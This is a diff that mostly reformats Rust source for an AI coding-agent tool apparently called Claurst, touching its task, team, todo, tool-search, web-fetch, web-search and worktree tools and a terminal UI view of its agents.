-        ToolResult::success(serde_json::to_string_pretty(&json!({
-            "success": true,
-            "task_id": task_id,
-            "updated_fields": updated_fields,
-        })).unwrap_or_default())
+        ToolResult::success(
+            serde_json::to_string_pretty(&json!({
+                "success": true,
+                "task_id": task_id,
+                "updated_fields": updated_fields,
+            }))
+            .unwrap_or_default(),
+        )
     }
 }
 
@@ -353,9 +376,15 @@ pub struct TaskListTool;
 
 #[async_trait]
 impl Tool for TaskListTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_LIST }
-    fn description(&self) -> &str { "List all active tasks (excluding deleted/completed)." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_LIST
+    }
+    fn description(&self) -> &str {
+        "List all active tasks (excluding deleted/completed)."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -406,9 +435,15 @@ struct TaskStopInput {
 
 #[async_trait]
 impl Tool for TaskStopTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_STOP }
-    fn description(&self) -> &str { "Stop a running background task." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::Execute }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_STOP
+    }
+    fn description(&self) -> &str {
+        "Stop a running background task."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::Execute
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -436,10 +471,13 @@ impl Tool for TaskStopTool {
                 }
                 task.status = TaskStatus::Completed;
                 task.updated_at = chrono::Utc::now();
-                ToolResult::success(serde_json::to_string_pretty(&json!({
-                    "message": "Task stopped",
-                    "task_id": params.task_id,
-                })).unwrap_or_default())
+                ToolResult::success(
+                    serde_json::to_string_pretty(&json!({
+                        "message": "Task stopped",
+                        "task_id": params.task_id,
+                    }))
+                    .unwrap_or_default(),
+                )
             }
             None => ToolResult::error(format!("Task '{}' not found", params.task_id)),
         }
@@ -459,13 +497,21 @@ struct TaskOutputInput {
     block: bool,
 }
 
-fn default_block() -> bool { true }
+fn default_block() -> bool {
+    true
+}
 
 #[async_trait]
 impl Tool for TaskOutputTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_OUTPUT }
-    fn description(&self) -> &str { "Get the output of a task." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_OUTPUT
+    }
+    fn description(&self) -> &str {
+        "Get the output of a task."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -489,14 +535,21 @@ impl Tool for TaskOutputTool {
                 let retrieval_status = match &task.status {
                     TaskStatus::Completed | TaskStatus::Failed => "success",
                     TaskStatus::Running | TaskStatus::InProgress => {
-                        if params.block { "success" } else { "not_ready" }
+                        if params.block {
+                            "success"
+                        } else {
+                            "not_ready"
+                        }
                     }
                     _ => "success",
                 };
-                ToolResult::success(serde_json::to_string_pretty(&json!({
-                    "retrieval_status": retrieval_status,
-                    "task": task.to_full_value(),
-                })).unwrap_or_default())
+                ToolResult::success(
+                    serde_json::to_string_pretty(&json!({
+                        "retrieval_status": retrieval_status,
+                        "task": task.to_full_value(),
+                    }))
+                    .unwrap_or_default(),
+                )
             }
             None => ToolResult::error(format!("Task '{}' not found", params.task_id)),
         }

--- a/src-rust/crates/tools/src/team_tool.rs
+++ b/src-rust/crates/tools/src/team_tool.rs
@@ -46,12 +46,12 @@ use uuid::Uuid;
 /// Returns the agent's final text output.
 pub type AgentRunFn = Arc<
     dyn Fn(
-            String,                // description
-            String,                // prompt
-            Option<Vec<String>>,   // tools allowlist
-            Option<String>,        // system prompt
-            Option<u32>,           // max_turns
-            Arc<ToolContext>,      // context
+            String,              // description
+            String,              // prompt
+            Option<Vec<String>>, // tools allowlist
+            Option<String>,      // system prompt
+            Option<u32>,         // max_turns
+            Arc<ToolContext>,    // context
         ) -> Pin<Box<dyn Future<Output = String> + Send>>
         + Send
         + Sync,
@@ -99,8 +99,7 @@ use dashmap::DashMap;
 use once_cell::sync::Lazy;
 use tokio_util::sync::CancellationToken;
 
-static ACTIVE_TEAMS: Lazy<DashMap<String, Vec<CancellationToken>>> =
-    Lazy::new(DashMap::new);
+static ACTIVE_TEAMS: Lazy<DashMap<String, Vec<CancellationToken>>> = Lazy::new(DashMap::new);
 
 // ---------------------------------------------------------------------------
 // Shared helpers
@@ -387,10 +386,7 @@ impl Tool for TeamCreateTool {
                 let agent_name = spec.name.clone();
                 let role = spec.role.clone().unwrap_or_else(|| "assistant".to_string());
                 let tools = spec.tools.clone();
-                let agent_task = spec
-                    .task
-                    .clone()
-                    .unwrap_or_else(|| params.task.clone());
+                let agent_task = spec.task.clone().unwrap_or_else(|| params.task.clone());
                 let team_name_inner = final_name.clone();
                 let cancel = cancel_tokens[i].clone();
                 let ctx_inner = ctx_arc.clone();

--- a/src-rust/crates/tools/src/todo_write.rs
+++ b/src-rust/crates/tools/src/todo_write.rs
@@ -234,8 +234,7 @@ impl Tool for TodoWriteTool {
                     if let Err(e) = validate_transition(&item.id, old_status, &item.status) {
                         return ToolResult::error(e);
                     }
-                    if old_status != &TodoStatus::Completed
-                        && item.status == TodoStatus::Completed
+                    if old_status != &TodoStatus::Completed && item.status == TodoStatus::Completed
                     {
                         newly_completed_ids.insert(&item.id);
                     }
@@ -391,9 +390,18 @@ mod tests {
 
     #[test]
     fn test_status_parsing_case_insensitive() {
-        assert_eq!(TodoStatus::from_str_ci("PENDING").unwrap(), TodoStatus::Pending);
-        assert_eq!(TodoStatus::from_str_ci("In_Progress").unwrap(), TodoStatus::InProgress);
-        assert_eq!(TodoStatus::from_str_ci("COMPLETED").unwrap(), TodoStatus::Completed);
+        assert_eq!(
+            TodoStatus::from_str_ci("PENDING").unwrap(),
+            TodoStatus::Pending
+        );
+        assert_eq!(
+            TodoStatus::from_str_ci("In_Progress").unwrap(),
+            TodoStatus::InProgress
+        );
+        assert_eq!(
+            TodoStatus::from_str_ci("COMPLETED").unwrap(),
+            TodoStatus::Completed
+        );
         assert!(TodoStatus::from_str_ci("done").is_err());
         assert!(TodoStatus::from_str_ci("").is_err());
     }
@@ -417,14 +425,18 @@ mod tests {
         assert!(validate_transition("t3", &TodoStatus::InProgress, &TodoStatus::Completed).is_ok());
         // no-op transitions are always fine
         assert!(validate_transition("t4", &TodoStatus::Pending, &TodoStatus::Pending).is_ok());
-        assert!(validate_transition("t5", &TodoStatus::InProgress, &TodoStatus::InProgress).is_ok());
+        assert!(
+            validate_transition("t5", &TodoStatus::InProgress, &TodoStatus::InProgress).is_ok()
+        );
         assert!(validate_transition("t6", &TodoStatus::Completed, &TodoStatus::Completed).is_ok());
     }
 
     #[test]
     fn test_invalid_transition_completed_to_anything() {
         assert!(validate_transition("t1", &TodoStatus::Completed, &TodoStatus::Pending).is_err());
-        assert!(validate_transition("t2", &TodoStatus::Completed, &TodoStatus::InProgress).is_err());
+        assert!(
+            validate_transition("t2", &TodoStatus::Completed, &TodoStatus::InProgress).is_err()
+        );
     }
 
     #[test]
@@ -437,7 +449,10 @@ mod tests {
     #[test]
     fn test_status_from_str_invalid() {
         let err = TodoStatus::from_str_ci("banana").unwrap_err();
-        assert!(err.contains("Invalid status"), "error should mention invalid status");
+        assert!(
+            err.contains("Invalid status"),
+            "error should mention invalid status"
+        );
         assert!(err.contains("banana"), "error should echo the bad value");
     }
 }

--- a/src-rust/crates/tools/src/tool_search.rs
+++ b/src-rust/crates/tools/src/tool_search.rs
@@ -23,7 +23,9 @@ struct ToolSearchInput {
     max_results: usize,
 }
 
-fn default_max() -> usize { 5 }
+fn default_max() -> usize {
+    5
+}
 
 /// A minimal catalog entry describing one tool.
 #[derive(Debug, Clone)]
@@ -35,44 +37,199 @@ struct ToolEntry {
 
 /// Static catalog of all built-in tools with keywords for scoring.
 static TOOL_CATALOG: &[ToolEntry] = &[
-    ToolEntry { name: "Bash", description: "Execute shell commands", keywords: &["shell", "run", "command", "exec", "terminal"] },
-    ToolEntry { name: "Read", description: "Read file contents", keywords: &["file", "read", "cat", "content"] },
-    ToolEntry { name: "Write", description: "Write or create files", keywords: &["file", "write", "create", "save"] },
-    ToolEntry { name: "Edit", description: "Edit existing files with string replacement", keywords: &["file", "edit", "modify", "replace", "patch"] },
-    ToolEntry { name: "Glob", description: "Find files by pattern", keywords: &["find", "pattern", "search", "files", "glob"] },
-    ToolEntry { name: "Grep", description: "Search file contents with regex", keywords: &["search", "regex", "grep", "find", "content"] },
-    ToolEntry { name: "WebFetch", description: "Fetch web page content", keywords: &["web", "fetch", "http", "url", "browser"] },
-    ToolEntry { name: "WebSearch", description: "Search the web", keywords: &["web", "search", "internet", "query"] },
-    ToolEntry { name: "NotebookEdit", description: "Edit Jupyter notebook cells", keywords: &["notebook", "jupyter", "ipynb", "cell"] },
-    ToolEntry { name: "TodoWrite", description: "Manage todo list", keywords: &["todo", "task", "list", "write"] },
-    ToolEntry { name: "AskUserQuestion", description: "Ask the user a question", keywords: &["ask", "question", "user", "input", "clarify"] },
-    ToolEntry { name: "EnterPlanMode", description: "Enter planning mode", keywords: &["plan", "mode", "planning"] },
-    ToolEntry { name: "ExitPlanMode", description: "Exit planning mode", keywords: &["plan", "exit", "mode"] },
-    ToolEntry { name: "Sleep", description: "Wait for a duration", keywords: &["sleep", "wait", "delay", "pause"] },
-    ToolEntry { name: "PowerShell", description: "Execute PowerShell commands", keywords: &["powershell", "windows", "ps", "command"] },
-    ToolEntry { name: "CronCreate", description: "Schedule a recurring cron task", keywords: &["cron", "schedule", "recurring", "timer"] },
-    ToolEntry { name: "CronDelete", description: "Cancel a scheduled cron task", keywords: &["cron", "delete", "cancel", "remove"] },
-    ToolEntry { name: "CronList", description: "List all cron tasks", keywords: &["cron", "list", "scheduled", "tasks"] },
-    ToolEntry { name: "EnterWorktree", description: "Create and enter a git worktree", keywords: &["worktree", "git", "branch", "isolate"] },
-    ToolEntry { name: "ExitWorktree", description: "Exit the current git worktree", keywords: &["worktree", "git", "exit", "restore"] },
-    ToolEntry { name: "TaskCreate", description: "Create a background task", keywords: &["task", "create", "background", "async"] },
-    ToolEntry { name: "TaskGet", description: "Get task details", keywords: &["task", "get", "status", "details"] },
-    ToolEntry { name: "TaskUpdate", description: "Update a task's status", keywords: &["task", "update", "status", "progress"] },
-    ToolEntry { name: "TaskList", description: "List all tasks", keywords: &["task", "list", "all", "tasks"] },
-    ToolEntry { name: "TaskStop", description: "Stop a running task", keywords: &["task", "stop", "kill", "cancel"] },
-    ToolEntry { name: "TaskOutput", description: "Get task output/logs", keywords: &["task", "output", "logs", "result"] },
-    ToolEntry { name: "ListMcpResources", description: "List MCP server resources", keywords: &["mcp", "resource", "list", "server"] },
-    ToolEntry { name: "ReadMcpResource", description: "Read an MCP resource", keywords: &["mcp", "resource", "read", "server"] },
-    ToolEntry { name: "Agent", description: "Launch a sub-agent for complex tasks", keywords: &["agent", "subagent", "task", "parallel", "delegate"] },
-    ToolEntry { name: "Brief", description: "Send a formatted message to the user", keywords: &["brief", "message", "notify", "proactive", "status", "update"] },
-    ToolEntry { name: "Config", description: "Get or set Claurst configuration", keywords: &["config", "settings", "model", "verbose", "permission", "configure"] },
-    ToolEntry { name: "SendMessage", description: "Send a message to another agent", keywords: &["send", "message", "agent", "broadcast", "communicate", "inbox"] },
-    ToolEntry { name: "Skill", description: "Execute a skill prompt template", keywords: &["skill", "command", "template", "prompt", "slash", "custom"] },
+    ToolEntry {
+        name: "Bash",
+        description: "Execute shell commands",
+        keywords: &["shell", "run", "command", "exec", "terminal"],
+    },
+    ToolEntry {
+        name: "Read",
+        description: "Read file contents",
+        keywords: &["file", "read", "cat", "content"],
+    },
+    ToolEntry {
+        name: "Write",
+        description: "Write or create files",
+        keywords: &["file", "write", "create", "save"],
+    },
+    ToolEntry {
+        name: "Edit",
+        description: "Edit existing files with string replacement",
+        keywords: &["file", "edit", "modify", "replace", "patch"],
+    },
+    ToolEntry {
+        name: "Glob",
+        description: "Find files by pattern",
+        keywords: &["find", "pattern", "search", "files", "glob"],
+    },
+    ToolEntry {
+        name: "Grep",
+        description: "Search file contents with regex",
+        keywords: &["search", "regex", "grep", "find", "content"],
+    },
+    ToolEntry {
+        name: "WebFetch",
+        description: "Fetch web page content",
+        keywords: &["web", "fetch", "http", "url", "browser"],
+    },
+    ToolEntry {
+        name: "WebSearch",
+        description: "Search the web",
+        keywords: &["web", "search", "internet", "query"],
+    },
+    ToolEntry {
+        name: "NotebookEdit",
+        description: "Edit Jupyter notebook cells",
+        keywords: &["notebook", "jupyter", "ipynb", "cell"],
+    },
+    ToolEntry {
+        name: "TodoWrite",
+        description: "Manage todo list",
+        keywords: &["todo", "task", "list", "write"],
+    },
+    ToolEntry {
+        name: "AskUserQuestion",
+        description: "Ask the user a question",
+        keywords: &["ask", "question", "user", "input", "clarify"],
+    },
+    ToolEntry {
+        name: "EnterPlanMode",
+        description: "Enter planning mode",
+        keywords: &["plan", "mode", "planning"],
+    },
+    ToolEntry {
+        name: "ExitPlanMode",
+        description: "Exit planning mode",
+        keywords: &["plan", "exit", "mode"],
+    },
+    ToolEntry {
+        name: "Sleep",
+        description: "Wait for a duration",
+        keywords: &["sleep", "wait", "delay", "pause"],
+    },
+    ToolEntry {
+        name: "PowerShell",
+        description: "Execute PowerShell commands",
+        keywords: &["powershell", "windows", "ps", "command"],
+    },
+    ToolEntry {
+        name: "CronCreate",
+        description: "Schedule a recurring cron task",
+        keywords: &["cron", "schedule", "recurring", "timer"],
+    },
+    ToolEntry {
+        name: "CronDelete",
+        description: "Cancel a scheduled cron task",
+        keywords: &["cron", "delete", "cancel", "remove"],
+    },
+    ToolEntry {
+        name: "CronList",
+        description: "List all cron tasks",
+        keywords: &["cron", "list", "scheduled", "tasks"],
+    },
+    ToolEntry {
+        name: "EnterWorktree",
+        description: "Create and enter a git worktree",
+        keywords: &["worktree", "git", "branch", "isolate"],
+    },
+    ToolEntry {
+        name: "ExitWorktree",
+        description: "Exit the current git worktree",
+        keywords: &["worktree", "git", "exit", "restore"],
+    },
+    ToolEntry {
+        name: "TaskCreate",
+        description: "Create a background task",
+        keywords: &["task", "create", "background", "async"],
+    },
+    ToolEntry {
+        name: "TaskGet",
+        description: "Get task details",
+        keywords: &["task", "get", "status", "details"],
+    },
+    ToolEntry {
+        name: "TaskUpdate",
+        description: "Update a task's status",
+        keywords: &["task", "update", "status", "progress"],
+    },
+    ToolEntry {
+        name: "TaskList",
+        description: "List all tasks",
+        keywords: &["task", "list", "all", "tasks"],
+    },
+    ToolEntry {
+        name: "TaskStop",
+        description: "Stop a running task",
+        keywords: &["task", "stop", "kill", "cancel"],
+    },
+    ToolEntry {
+        name: "TaskOutput",
+        description: "Get task output/logs",
+        keywords: &["task", "output", "logs", "result"],
+    },
+    ToolEntry {
+        name: "ListMcpResources",
+        description: "List MCP server resources",
+        keywords: &["mcp", "resource", "list", "server"],
+    },
+    ToolEntry {
+        name: "ReadMcpResource",
+        description: "Read an MCP resource",
+        keywords: &["mcp", "resource", "read", "server"],
+    },
+    ToolEntry {
+        name: "Agent",
+        description: "Launch a sub-agent for complex tasks",
+        keywords: &["agent", "subagent", "task", "parallel", "delegate"],
+    },
+    ToolEntry {
+        name: "Brief",
+        description: "Send a formatted message to the user",
+        keywords: &[
+            "brief",
+            "message",
+            "notify",
+            "proactive",
+            "status",
+            "update",
+        ],
+    },
+    ToolEntry {
+        name: "Config",
+        description: "Get or set Claurst configuration",
+        keywords: &[
+            "config",
+            "settings",
+            "model",
+            "verbose",
+            "permission",
+            "configure",
+        ],
+    },
+    ToolEntry {
+        name: "SendMessage",
+        description: "Send a message to another agent",
+        keywords: &[
+            "send",
+            "message",
+            "agent",
+            "broadcast",
+            "communicate",
+            "inbox",
+        ],
+    },
+    ToolEntry {
+        name: "Skill",
+        description: "Execute a skill prompt template",
+        keywords: &["skill", "command", "template", "prompt", "slash", "custom"],
+    },
 ];
 
 #[async_trait]
 impl Tool for ToolSearchTool {
-    fn name(&self) -> &str { "ToolSearch" }
+    fn name(&self) -> &str {
+        "ToolSearch"
+    }
 
     fn description(&self) -> &str {
         "Search for available tools by name or keyword. Use 'select:ToolName' for direct \
@@ -80,7 +237,9 @@ impl Tool for ToolSearchTool {
          descriptions. Max 5 results by default."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -115,9 +274,10 @@ impl Tool for ToolSearchTool {
             let mut missing = Vec::new();
 
             for name in requested {
-                if let Some(entry) = TOOL_CATALOG.iter().find(|e| {
-                    e.name.eq_ignore_ascii_case(name)
-                }) {
+                if let Some(entry) = TOOL_CATALOG
+                    .iter()
+                    .find(|e| e.name.eq_ignore_ascii_case(name))
+                {
                     found.push(format!("{}: {}", entry.name, entry.description));
                 } else {
                     missing.push(name.to_string());
@@ -172,7 +332,11 @@ impl Tool for ToolSearchTool {
                     }
                 }
 
-                if score > 0 { Some((score, entry)) } else { None }
+                if score > 0 {
+                    Some((score, entry))
+                } else {
+                    None
+                }
             })
             .collect();
 

--- a/src-rust/crates/tools/src/web_fetch.rs
+++ b/src-rust/crates/tools/src/web_fetch.rs
@@ -82,9 +82,8 @@ fn is_edge_case_html(html: &str, extracted_text: &str) -> bool {
 
     // Check for semantic HTML tags
     let lower = html.to_lowercase();
-    let has_semantic = lower.contains("<article") ||
-                      lower.contains("<main") ||
-                      lower.contains("<body");
+    let has_semantic =
+        lower.contains("<article") || lower.contains("<main") || lower.contains("<body");
 
     if !has_semantic {
         debug!("Edge case: no semantic HTML tags");
@@ -142,7 +141,10 @@ async fn semantic_extraction(html: &str, ctx: &ToolContext) -> Option<String> {
             });
 
             if let Some(extracted) = text {
-                debug!(extracted_len = extracted.len(), "Semantic extraction successful");
+                debug!(
+                    extracted_len = extracted.len(),
+                    "Semantic extraction successful"
+                );
                 return Some(extracted);
             }
 
@@ -185,9 +187,9 @@ fn strip_html(html: &str) -> String {
             }
             // Block tags => newline
             let block_tags = [
-                "<br", "<p ", "<p>", "</p>", "<div", "</div>", "<h1", "<h2", "<h3",
-                "<h4", "<h5", "<h6", "</h1", "</h2", "</h3", "</h4", "</h5", "</h6",
-                "<li", "</li", "<tr", "</tr", "<hr",
+                "<br", "<p ", "<p>", "</p>", "<div", "</div>", "<h1", "<h2", "<h3", "<h4", "<h5",
+                "<h6", "</h1", "</h2", "</h3", "</h4", "</h5", "</h6", "<li", "</li", "<tr",
+                "</tr", "<hr",
             ];
             for tag in &block_tags {
                 if rest.starts_with(tag) {
@@ -324,7 +326,8 @@ impl Tool for WebFetchTool {
             Err(e) => return ToolResult::error(format!("Failed to create HTTP client: {}", e)),
         };
 
-        let resp = match client.get(&params.url)
+        let resp = match client
+            .get(&params.url)
             .header("User-Agent", "Claude-Code/1.0")
             .send()
             .await
@@ -335,10 +338,7 @@ impl Tool for WebFetchTool {
 
         let status = resp.status();
         if !status.is_success() {
-            return ToolResult::error(format!(
-                "HTTP {} when fetching {}",
-                status, params.url
-            ));
+            return ToolResult::error(format!("HTTP {} when fetching {}", status, params.url));
         }
 
         let content_type = resp

--- a/src-rust/crates/tools/src/web_search.rs
+++ b/src-rust/crates/tools/src/web_search.rs
@@ -68,7 +68,10 @@ impl Tool for WebSearchTool {
         debug!(query = %params.query, num_results, "Web search");
 
         // Try Brave Search API first, then fall back to DuckDuckGo
-        if let Some(api_key) = std::env::var("BRAVE_SEARCH_API_KEY").ok().filter(|k| !k.is_empty()) {
+        if let Some(api_key) = std::env::var("BRAVE_SEARCH_API_KEY")
+            .ok()
+            .filter(|k| !k.is_empty())
+        {
             search_brave(&params.query, num_results, &api_key).await
         } else {
             search_duckduckgo(&params.query, num_results).await
@@ -120,11 +123,23 @@ fn format_brave_results(data: &Value, max: usize) -> String {
 
     if let Some(items) = web_results {
         for (i, item) in items.iter().take(max).enumerate() {
-            let title = item.get("title").and_then(|t| t.as_str()).unwrap_or("(No title)");
+            let title = item
+                .get("title")
+                .and_then(|t| t.as_str())
+                .unwrap_or("(No title)");
             let url = item.get("url").and_then(|u| u.as_str()).unwrap_or("");
-            let snippet = item.get("description").and_then(|s| s.as_str()).unwrap_or("");
+            let snippet = item
+                .get("description")
+                .and_then(|s| s.as_str())
+                .unwrap_or("");
 
-            output.push_str(&format!("{}. **{}**\n   URL: {}\n   {}\n\n", i + 1, title, url, snippet));
+            output.push_str(&format!(
+                "{}. **{}**\n   URL: {}\n   {}\n\n",
+                i + 1,
+                title,
+                url,
+                snippet
+            ));
         }
     }
 
@@ -175,9 +190,18 @@ fn format_ddg_results(data: &Value, max: usize) -> String {
     // Abstract (main answer)
     if let Some(abstract_text) = data.get("Abstract").and_then(|a| a.as_str()) {
         if !abstract_text.is_empty() {
-            let source = data.get("AbstractSource").and_then(|s| s.as_str()).unwrap_or("");
-            let url = data.get("AbstractURL").and_then(|u| u.as_str()).unwrap_or("");
-            output.push_str(&format!("**{}**\n{}\nURL: {}\n\n", source, abstract_text, url));
+            let source = data
+                .get("AbstractSource")
+                .and_then(|s| s.as_str())
+                .unwrap_or("");
+            let url = data
+                .get("AbstractURL")
+                .and_then(|u| u.as_str())
+                .unwrap_or("");
+            output.push_str(&format!(
+                "**{}**\n{}\nURL: {}\n\n",
+                source, abstract_text, url
+            ));
             count += 1;
         }
     }

--- a/src-rust/crates/tools/src/worktree.rs
+++ b/src-rust/crates/tools/src/worktree.rs
@@ -55,7 +55,9 @@ struct EnterWorktreeInput {
 
 #[async_trait]
 impl Tool for EnterWorktreeTool {
-    fn name(&self) -> &str { "EnterWorktree" }
+    fn name(&self) -> &str {
+        "EnterWorktree"
+    }
 
     fn description(&self) -> &str {
         "Create a new git worktree and switch the session's working directory to it. \
@@ -64,7 +66,9 @@ impl Tool for EnterWorktreeTool {
          Use ExitWorktree to return to the original directory."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::Write }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::Write
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -102,11 +106,7 @@ impl Tool for EnterWorktreeTool {
             }
         }
 
-        if let Err(e) = ctx.check_permission(
-            self.name(),
-            "Create a git worktree",
-            false,
-        ) {
+        if let Err(e) = ctx.check_permission(self.name(), "Create a git worktree", false) {
             return ToolResult::error(e.to_string());
         }
 
@@ -128,7 +128,10 @@ impl Tool for EnterWorktreeTool {
             let day_of_year = days % 365;
             let month = day_of_year / 30 + 1;
             let day = day_of_year % 30 + 1;
-            format!("claurst-{:04}{:02}{:02}-{:02}{:02}{:02}", year, month, day, h, m, s)
+            format!(
+                "claurst-{:04}{:02}{:02}-{:02}{:02}{:02}",
+                year, month, day, h, m, s
+            )
         });
 
         // Determine worktree path
@@ -221,15 +224,23 @@ impl Tool for EnterWorktreeTool {
                     match shell_result {
                         Ok(out) if out.status.success() => {
                             let stdout = String::from_utf8_lossy(&out.stdout);
-                            format!("\nPost-create command '{}' completed successfully.{}",
+                            format!(
+                                "\nPost-create command '{}' completed successfully.{}",
                                 cmd,
-                                if stdout.trim().is_empty() { String::new() } else { format!("\nOutput: {}", stdout.trim()) }
+                                if stdout.trim().is_empty() {
+                                    String::new()
+                                } else {
+                                    format!("\nOutput: {}", stdout.trim())
+                                }
                             )
                         }
                         Ok(out) => {
                             let stderr = String::from_utf8_lossy(&out.stderr);
-                            format!("\nPost-create command '{}' exited with error.\nStderr: {}",
-                                cmd, stderr.trim())
+                            format!(
+                                "\nPost-create command '{}' exited with error.\nStderr: {}",
+                                cmd,
+                                stderr.trim()
+                            )
                         }
                         Err(e) => format!("\nCould not run post-create command '{}': {}", cmd, e),
                     }
@@ -273,11 +284,15 @@ struct ExitWorktreeInput {
     discard_changes: bool,
 }
 
-fn default_action() -> String { "keep".to_string() }
+fn default_action() -> String {
+    "keep".to_string()
+}
 
 #[async_trait]
 impl Tool for ExitWorktreeTool {
-    fn name(&self) -> &str { "ExitWorktree" }
+    fn name(&self) -> &str {
+        "ExitWorktree"
+    }
 
     fn description(&self) -> &str {
         "Exit the current worktree session created by EnterWorktree and restore the \
@@ -286,7 +301,9 @@ impl Tool for ExitWorktreeTool {
          by EnterWorktree in this session."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::Write }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::Write
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -376,7 +393,13 @@ impl Tool for ExitWorktreeTool {
                 // but keep the directory on disk.
                 let _ = run_git(
                     &session.original_cwd,
-                    &["worktree", "lock", "--reason", "kept by ExitWorktree", &worktree_str],
+                    &[
+                        "worktree",
+                        "lock",
+                        "--reason",
+                        "kept by ExitWorktree",
+                        &worktree_str,
+                    ],
                 )
                 .await;
 
@@ -398,11 +421,7 @@ impl Tool for ExitWorktreeTool {
 
                 // Delete the branch if we created it
                 if let Some(ref branch) = session.branch {
-                    let _ = run_git(
-                        &session.original_cwd,
-                        &["branch", "-D", branch],
-                    )
-                    .await;
+                    let _ = run_git(&session.original_cwd, &["branch", "-D", branch]).await;
                 }
 
                 ToolResult::success(format!(

--- a/src-rust/crates/tui/src/agents_view.rs
+++ b/src-rust/crates/tui/src/agents_view.rs
@@ -11,8 +11,8 @@ use ratatui::{
 use std::path::{Path, PathBuf};
 
 use crate::overlays::{
-    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT,
-    CLAURST_MUTED, CLAURST_PANEL_BG, CLAURST_TEXT,
+    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT, CLAURST_MUTED,
+    CLAURST_PANEL_BG, CLAURST_TEXT,
 };
 
 // ---------------------------------------------------------------------------
@@ -197,7 +197,7 @@ impl AgentEditorState {
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub enum AgentsRoute {
     List,
-    Detail(usize),        // index into definitions
+    Detail(usize),         // index into definitions
     Editor(Option<usize>), // None = create new
 }
 
@@ -381,7 +381,9 @@ pub fn load_agent_definitions(project_root: &std::path::Path) -> Vec<AgentDefini
 
     for dir_opt in &dirs {
         let Some(dir) = dir_opt else { continue };
-        let Ok(entries) = std::fs::read_dir(dir) else { continue };
+        let Ok(entries) = std::fs::read_dir(dir) else {
+            continue;
+        };
         for entry in entries.flatten() {
             let path = entry.path();
             if path.extension().map_or(false, |e| e == "md") {
@@ -405,8 +407,8 @@ fn parse_agent_def(path: &std::path::Path) -> Option<AgentDefinition> {
         let body = content[end + 4..].trim().to_string();
         let name = extract_yaml_str(front, "name").unwrap_or_else(|| stem.clone());
         let model = extract_yaml_str(front, "model");
-        let memory = extract_yaml_str(front, "memory_scope")
-            .or_else(|| extract_yaml_str(front, "memory"));
+        let memory =
+            extract_yaml_str(front, "memory_scope").or_else(|| extract_yaml_str(front, "memory"));
         let desc = extract_yaml_str(front, "description").unwrap_or_default();
         let tools = extract_yaml_list(front, "tools");
         (name, model, memory, desc, tools, body)
@@ -437,12 +439,7 @@ fn parse_agent_def(path: &std::path::Path) -> Option<AgentDefinition> {
 fn extract_yaml_str(front: &str, key: &str) -> Option<String> {
     for line in front.lines() {
         if let Some(rest) = line.strip_prefix(&format!("{key}:")) {
-            return Some(
-                rest.trim()
-                    .trim_matches('"')
-                    .trim_matches('\'')
-                    .to_string(),
-            );
+            return Some(rest.trim().trim_matches('"').trim_matches('\'').to_string());
         }
     }
     None
@@ -454,12 +451,7 @@ fn extract_yaml_list(front: &str, key: &str) -> Vec<String> {
             let rest = rest.trim().trim_matches('[').trim_matches(']');
             return rest
                 .split(',')
-                .map(|s| {
-                    s.trim()
-                        .trim_matches('"')
-                        .trim_matches('\'')
-                        .to_string()
-                })
+                .map(|s| s.trim().trim_matches('"').trim_matches('\'').to_string())
                 .filter(|s| !s.is_empty())
                 .collect();
         }
@@ -601,7 +593,9 @@ pub fn render_agents_menu(state: &AgentsMenuState, area: Rect, buf: &mut Buffer)
     }
     Paragraph::new(Line::from(vec![Span::styled(
         footer,
-        Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(CLAURST_MUTED)
+            .add_modifier(Modifier::ITALIC),
     )]))
     .render(layout.footer_area, buf);
 }
@@ -611,7 +605,9 @@ fn render_agents_list(state: &AgentsMenuState, area: Rect, buf: &mut Buffer) {
     if !state.active_agents.is_empty() {
         lines.push(Line::from(vec![Span::styled(
             " Active now",
-            Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
         )]));
         for agent in state.active_agents.iter().take(3) {
             lines.push(Line::from(vec![
@@ -647,7 +643,11 @@ fn render_agents_list(state: &AgentsMenuState, area: Rect, buf: &mut Buffer) {
         let abs_idx = start + i;
         let selected = state.selected_row == abs_idx + 1;
         let model_str = def.model.as_deref().unwrap_or("default");
-        let shadow_suffix = if def.shadowed_by.is_some() { " ⚠" } else { "" };
+        let shadow_suffix = if def.shadowed_by.is_some() {
+            " ⚠"
+        } else {
+            ""
+        };
         lines.push(agent_list_row(
             def.name.clone(),
             format!("{}  ·  {}{}", model_str, def.source, shadow_suffix),
@@ -699,7 +699,9 @@ fn render_agent_detail(def: &AgentDefinition, area: Rect, buf: &mut Buffer) {
     lines.push(Line::default());
     lines.push(Line::from(vec![Span::styled(
         " Description",
